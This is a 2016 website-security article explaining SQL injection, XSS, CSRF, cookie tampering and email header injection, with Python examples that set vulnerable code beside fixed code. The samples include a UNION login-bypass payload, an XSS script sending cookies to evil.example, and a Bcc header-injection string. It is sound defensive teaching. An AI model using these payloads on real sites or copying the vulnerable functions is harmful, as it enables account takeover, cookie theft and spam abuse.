Sep 05, 2016
Website security can be a big problem for businesses. Your website faces attack from many different sources, and without the proper precautions you are likely to find it breached and your data compromised.
These five website security issues are among the most dangerous threats facing your website. As well as causing serious harm, they tend to slip under the radar, and with thousands of businesses making web application security mistakes every year, it's time you took action to protect your site.
SQL Injection
In order for visitors to browse, log in and purchase products, business websites rely on databases of stored information. These databases typically contain user IDs, login credentials, payment details and a whole host of other sensitive data. Your website reads and writes this data using a query language, Structured Query Language (SQL), and it builds those queries partly from values your visitors supply.
Because queries are built from user-supplied values, SQL is a common target for malicious third parties. If user input (a form field, a URL parameter, a cookie or an HTTP header) is pasted directly into the text of a query, an attacker can 'inject' their own SQL into it. Injected commands can be used to read or delete vast swathes of customer data, steal payment information, bypass login checks or insert thousands of spam-ridden links into your website.
As long as you're aware of the problem, SQL injection is relatively easy to avoid. The reliable fix is never to build queries by string concatenation: use parameterised queries (prepared statements), in which the query text is fixed and user input is passed separately as data, so the database never interprets it as SQL. Stripping or escaping 'dangerous' characters such as quotes and slashes (often called sanitisation) is a weaker, error-prone substitute, because it has to anticipate every encoding and every query context; it is only a fallback where parameters cannot be used (table or column names, for example), and there the value should be checked against an allow-list instead. Encryption does not stop injection; what it does is limit the damage. Passwords should be stored only as salted, slow hashes (bcrypt, scrypt, Argon2 or PBKDF2), and payment data should be kept out of your own database wherever possible, so that an attacker who does extract a table gains little.
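The login check below is an added example (not code from the original article) showing the difference the query style makes. It assumes an in-memory SQLite users table constructed for the demonstration, with passwords stored as salted PBKDF2 hashes. The vulnerable version splices the username into the SQL text; the attacker's payload uses a UNION to return a row whose salt and hash they computed themselves, so a password they chose verifies as alice. The parameterised version treats the same payload as a plain string and finds no such user.

```python
import hashlib
import hmac
import secrets
import sqlite3

# Constructed in-memory users table for the demonstration, not a real schema.
PBKDF2_ITERATIONS = 100_000


def hash_password(password: str, salt: bytes) -> str:
    """Salted, slow password hash; stored as hex so it fits a TEXT column."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS).hex()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, salt TEXT, password_hash TEXT)"
    )
    salt = secrets.token_bytes(16)
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        ("alice", salt.hex(), hash_password("correct horse battery", salt)),
    )
    conn.commit()
    return conn


def _check_row(row, password: str):
    """Verify the supplied password against the row the query returned."""
    if row is None:
        return None
    username, salt_hex, stored_hash = row
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    # Constant-time comparison so the check does not leak via timing.
    return username if hmac.compare_digest(candidate, stored_hash) else None


def login_vulnerable(conn, username: str, password: str):
    # BAD: the username is spliced into the SQL text, so it can rewrite the query.
    sql = "SELECT username, salt, password_hash FROM users WHERE username = '%s'" % username
    return _check_row(conn.execute(sql).fetchone(), password)


def login_safe(conn, username: str, password: str):
    # GOOD: the query text is fixed; sqlite3 passes the value as a parameter.
    sql = "SELECT username, salt, password_hash FROM users WHERE username = ?"
    return _check_row(conn.execute(sql, (username,)).fetchone(), password)


def union_payload(password: str) -> str:
    """Attacker's username field: closes the quote, appends a row containing a
    salt and hash the attacker computed for a password they know, and comments
    out the rest of the query. The appended row is what _check_row then verifies."""
    fake_salt = bytes(16)
    return "' UNION SELECT 'alice', '%s', '%s' --" % (
        fake_salt.hex(),
        hash_password(password, fake_salt),
    )


if __name__ == "__main__":
    db = make_db()
    print(login_safe(db, "alice", "correct horse battery"))            # alice
    print(login_vulnerable(db, union_payload("anything"), "anything"))  # alice (bypassed)
    print(login_safe(db, union_payload("anything"), "anything"))        # None
```

Note that the vulnerable query never even touches the stored hash: the attacker supplies the row that gets checked. No amount of character stripping fixes that reliably; the parameter placeholder does.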
Cross-Site Scripting
Cross-site scripting (also known as XSS) is a technique that allows attackers to embed malicious script into a website page, most commonly through a comment form or another field whose contents are later displayed to other visitors. The script is then executed by the web browser of every legitimate user who views the page, running with that user's session: it can steal cookies, perform actions as the user, or deface the page they see. The defence is to treat all user-supplied content as text, not markup: encode it for the context in which it is output (HTML body, attribute, URL and JavaScript each need different encoding), and only emit links whose scheme you recognise, since a javascript: URL in an href is a script too. A Content-Security-Policy header adds a second layer by telling browsers not to run inline scripts at all.
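An added example (not from the original article) of rendering stored comments both ways. The comment data is constructed for the demonstration and includes two XSS attempts: an attribute breakout in the author field, a script tag in the text, and a javascript: link. The safe renderer HTML-encodes each value for its context and validates the link scheme separately, because encoding alone leaves a javascript: URL intact.

```python
import html
from urllib.parse import urlsplit

# Constructed comment submissions for the demonstration, two of them hostile.
COMMENTS = [
    {"author": "dave", "text": "Great post!", "site": "https://example.org/dave"},
    {
        "author": 'x" onmouseover="alert(1)',
        "text": "<script>new Image().src='https://evil.example/?c='+document.cookie</script>",
        "site": "javascript:alert(document.cookie)",
    },
]

ALLOWED_SCHEMES = {"http", "https"}


def safe_href(url: str) -> str:
    """Allow only absolute http(s) links. Escaping does not stop a javascript:
    URL because it is perfectly valid attribute text; the scheme must be checked."""
    url = url.strip()
    try:
        parts = urlsplit(url)
    except ValueError:
        return "#"
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return "#"
    return html.escape(url, quote=True)


def render_comment_unsafe(c: dict) -> str:
    # BAD: user data dropped straight into markup; every field is an injection point.
    return '<p class="comment"><a href="%s" data-author="%s">%s</a>: %s</p>' % (
        c["site"], c["author"], c["author"], c["text"]
    )


def render_comment_safe(c: dict) -> str:
    # GOOD: each value encoded for the context it lands in (attribute, text, URL).
    author = html.escape(c["author"], quote=True)
    text = html.escape(c["text"], quote=True)
    return '<p class="comment"><a href="%s" data-author="%s">%s</a>: %s</p>' % (
        safe_href(c["site"]), author, author, text
    )


def render_page(comments, safe: bool = True) -> str:
    render = render_comment_safe if safe else render_comment_unsafe
    return "\n".join(render(c) for c in comments)


# Second layer, sent as a response header: no inline scripts run even if encoding is missed.
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'")


if __name__ == "__main__":
    print(render_page(COMMENTS, safe=False))
    print(render_page(COMMENTS, safe=True))
```

A real template engine does the encoding for you when auto-escaping is on; the scheme check on links and the CSP header are the two pieces you still have to add yourself.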
Cross-Site Request Forgery
Cross-site request forgery (also known as CSRF or XSRF) tricks a user who is currently logged in to your website into triggering an action they never intended.
There are two stages to these attacks. Logged-in users of the target site are lured to a malicious website (or to a page carrying attacker-controlled HTML, such as an image tag or a hidden form); once there, code on that page causes the user's browser to send a request to the target website, and because the browser automatically attaches the user's cookies, the request carries their authority as a logged-in user. The attacker cannot read the response, so the goal is a state-changing action: posting spam comments, changing the victim's email address or password, or placing an order.
This problem is remedied with anti-CSRF tokens rather than timestamps. Issue each logged-in session a unique, unguessable random token, embed it in every form (and in the headers of any script-driven request) that changes state, and reject any such request whose token does not match the one stored for that session. A malicious site cannot read the token from your pages, so it cannot forge a valid request. Marking your session cookie SameSite adds a further layer in browsers that support it, but the token check is what you should rely on.
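The token scheme described above, as an added example that is not part of the original article. It assumes a server-side session represented as a plain dict (in a real application this is whatever your session store holds for the session cookie) and a hypothetical /comment handler. The demo walks the two stages: the attacker's page gets the browser to submit with alice's cookie, but without her token the request is refused.

```python
import hmac
import html
import secrets

# A "session" here is a dict the server keeps per logged-in user; in a real app
# it lives in your session store, looked up from the session cookie.


def csrf_token_for(session: dict) -> str:
    """Return the session's anti-CSRF token, minting one on first use."""
    token = session.get("csrf_token")
    if token is None:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        session["csrf_token"] = token
    return token


def render_comment_form(session: dict) -> str:
    """The token travels in a hidden field; a third-party page cannot read it."""
    return (
        '<form method="post" action="/comment">'
        '<input type="hidden" name="csrf_token" value="%s">'
        '<textarea name="text"></textarea><button>Post</button></form>'
        % html.escape(csrf_token_for(session), quote=True)
    )


def csrf_token_valid(session: dict, submitted) -> bool:
    expected = session.get("csrf_token")
    if expected is None or not isinstance(submitted, str):
        return False
    # Constant-time comparison: token checks should not leak via timing.
    return hmac.compare_digest(expected, submitted)


def post_comment(session: dict, form: dict, comments: list):
    """Server-side handler for a state-changing request (hypothetical /comment)."""
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, "request rejected: missing or invalid CSRF token"
    comments.append({"user": session["user"], "text": form.get("text", "")})
    return 200, "comment posted"


def demo():
    session = {"user": "alice"}  # alice is logged in
    comments = []
    # 1) alice loads the real form: the page carries her token.
    page = render_comment_form(session)
    token = session["csrf_token"]
    # 2) forged request from evil.example: the browser sends alice's session
    #    cookie, so the handler sees her session, but the attacker has no token.
    forged_status, _ = post_comment(session, {"text": "buy cheap pills"}, comments)
    # 3) legitimate submission from the real form.
    real_status, _ = post_comment(session, {"csrf_token": token, "text": "nice"}, comments)
    return forged_status, real_status, comments, token in page


if __name__ == "__main__":
    print(demo())  # (403, 200, [{'user': 'alice', 'text': 'nice'}], True)
```

The token is bound to the session, not the user: a token lifted from one session is rejected by another, and logging out discards it.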
Cookie Tampering
Cookies play a vital role in modern website development. They allow users to log in to your website, stay logged in as they browse, and engage with personalised offers and promotions. They also play an essential role in ecommerce sites, tracking items in a user's shopping basket and tallying product prices.
Whilst cookies are a vital tool in a developer's arsenal, they are also entirely under the visitor's control: anything your website stores in a cookie can be read and rewritten by a malicious third party before it is sent back. If your website simply trusts the values it receives, serious damage can follow.
Ecommerce systems can be crippled by cookie tampering, with third parties able to edit the price of items before checking out, or change a user ID to log in as another user. The fix has two parts. First, never store authority or business data such as user IDs, roles, prices or cart totals in a cookie; keep them on the server, price the basket from your catalogue at checkout, and store only an unguessable session identifier client-side. Second, anything that must live in a cookie should be signed with a secret key (an HMAC), so the server can detect any modification and discard the cookie. Never store passwords in cookies in any form.
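An added example (not the article's own code) of both halves of that fix: cookie values carry an HMAC-SHA256 tag so edits are detected, and the basket is priced from a server-side catalogue rather than from anything in the cookie. The catalogue, the key and the cookie format (base64 body, a dot, base64 tag) are assumptions made for the demonstration.

```python
import base64
import binascii
import hashlib
import hmac
import json
import secrets

SECRET_KEY = secrets.token_bytes(32)  # generated per run here; load from config in a real app

# Constructed server-side catalogue: prices live here, never in the cookie (pence).
CATALOGUE = {"A100": 4999, "B200": 1250}


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str):
    try:
        return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))
    except (binascii.Error, ValueError):
        return None


def sign_cookie(payload: dict, key: bytes = SECRET_KEY) -> str:
    """Encode the payload and append an HMAC-SHA256 tag: value = body.tag"""
    body = _b64e(json.dumps(payload, sort_keys=True, separators=(",", ":")).encode())
    tag = hmac.new(key, body.encode("utf-8"), hashlib.sha256).digest()
    return body + "." + _b64e(tag)


def verify_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Return the payload only if the tag matches; anything else yields None."""
    body, sep, tag_text = cookie.rpartition(".")
    if not sep:
        return None
    tag = _b64d(tag_text)
    expected = hmac.new(key, body.encode("utf-8"), hashlib.sha256).digest()
    if tag is None or not hmac.compare_digest(expected, tag):
        return None
    raw = _b64d(body)
    if raw is None:
        return None
    try:
        return json.loads(raw)
    except ValueError:
        return None


def tamper_with_cookie(cookie: str, new_payload: dict) -> str:
    """What an attacker can do without the key: rewrite the body, keep the old tag."""
    _, _, old_tag = cookie.rpartition(".")
    body = _b64e(json.dumps(new_payload, sort_keys=True, separators=(",", ":")).encode())
    return body + "." + old_tag


def cart_total(cart_cookie: str, key: bytes = SECRET_KEY):
    """Checkout: accept the cookie only if it verifies, then price it from the catalogue."""
    cart = verify_cookie(cart_cookie, key)
    if cart is None:
        return None
    items = cart.get("items", {})
    return sum(CATALOGUE[sku] * int(qty) for sku, qty in items.items() if sku in CATALOGUE)


if __name__ == "__main__":
    cookie = sign_cookie({"items": {"A100": 1, "B200": 2}})
    print(cart_total(cookie))                                                    # 7499
    print(cart_total(tamper_with_cookie(cookie, {"items": {"A100": 1, "B200": 200}})))  # None
```

Note that the cookie only ever carries SKUs and quantities; even a successfully forged quantity cannot change a price, because prices are never read from the client. Signing prevents tampering but not reading: do not put anything secret in a signed cookie, and prefer a random session ID with the basket held server-side.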
Email Form Header Injection
Contact forms are another popular web development tool, but they aren't without their own set of problems. A contact form turns user-inputted fields into an email, and fields such as the sender's name, address or subject typically end up in the email's headers. Email headers are separated by line breaks, so if a visitor can smuggle a carriage return or line feed into one of these fields, they can append headers of their own (Bcc:, Cc:, To:) and hijack the form to send huge volumes of spam.
Your contact form can then be made to send those messages to external email accounts rather than your own inbox. This can quickly lead to your website, email address and server being blacklisted for spam activity.
To protect against this, your contact form must validate every field that is placed in a header: reject any value containing a carriage return, line feed or null byte (and, for address fields, commas or anything else that is not a single address), keep the From and To addresses fixed in your own code rather than taken from the form, and put the free-text message only in the body, where line breaks are harmless. Rejecting the submission outright is safer than trying to strip the offending characters out.
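An added example (not from the original article) of a contact-form handler that applies those rules. The inbox address, sender address and form field names are assumptions for the demonstration; the submissions in the usage are constructed, two of them carrying header-injection attempts.

```python
import re
from email.message import EmailMessage

SITE_INBOX = "contact@example.com"   # fixed in code, never taken from the form
FORM_SENDER = "webform@example.com"

# A header value must be a single line; CR, LF and NUL are how a second header is smuggled in.
_FORBIDDEN = re.compile(r"[\r\n\x00]")
# One bare address: no commas/semicolons (address-list separators), no spaces, one @.
_ADDRESS = re.compile(r"^[^\s@,;<>]+@[^\s@,;<>]+\.[^\s@,;<>]+$")


def header_value_ok(value) -> bool:
    return isinstance(value, str) and not _FORBIDDEN.search(value)


def address_ok(value) -> bool:
    return header_value_ok(value) and _ADDRESS.match(value) is not None


def handle_contact_form(form: dict):
    """Return (400, reason) for a rejected submission or (200, EmailMessage)."""
    name = form.get("name", "")
    reply_to = form.get("email", "")
    subject = form.get("subject", "")
    body = form.get("message", "")
    if not header_value_ok(name) or not header_value_ok(subject):
        return 400, "name and subject must be single lines"
    if not address_ok(reply_to):
        return 400, "email must be a single valid address"
    msg = EmailMessage()
    msg["From"] = FORM_SENDER
    msg["To"] = SITE_INBOX
    msg["Reply-To"] = reply_to
    msg["Subject"] = subject[:200]
    # Free text goes only in the body, where line breaks cannot become headers.
    msg.set_content("Message from %s:\n\n%s" % (name, body))
    return 200, msg


def recipients(msg: EmailMessage):
    """Every address the mail server would deliver this message to."""
    return [str(msg[h]) for h in ("To", "Cc", "Bcc") if msg[h] is not None]


if __name__ == "__main__":
    # Constructed submissions: one legitimate, two injection attempts.
    print(handle_contact_form({"name": "Bob", "email": "bob@example.org",
                               "subject": "Hello", "message": "Hi there"})[0])       # 200
    print(handle_contact_form({"name": "Bob", "email": "bob@example.org",
                               "subject": "Hello\r\nBcc: victim@example.net",
                               "message": "spam"})[0])                                 # 400
    print(handle_contact_form({"name": "Bob", "email": "bob@example.org, victim@example.net",
                               "subject": "Hello", "message": "spam"})[0])           # 400
```

Keeping To fixed in code means that even a validation slip elsewhere cannot change where the mail is delivered; the validation then only has to protect the headers the visitor does influence.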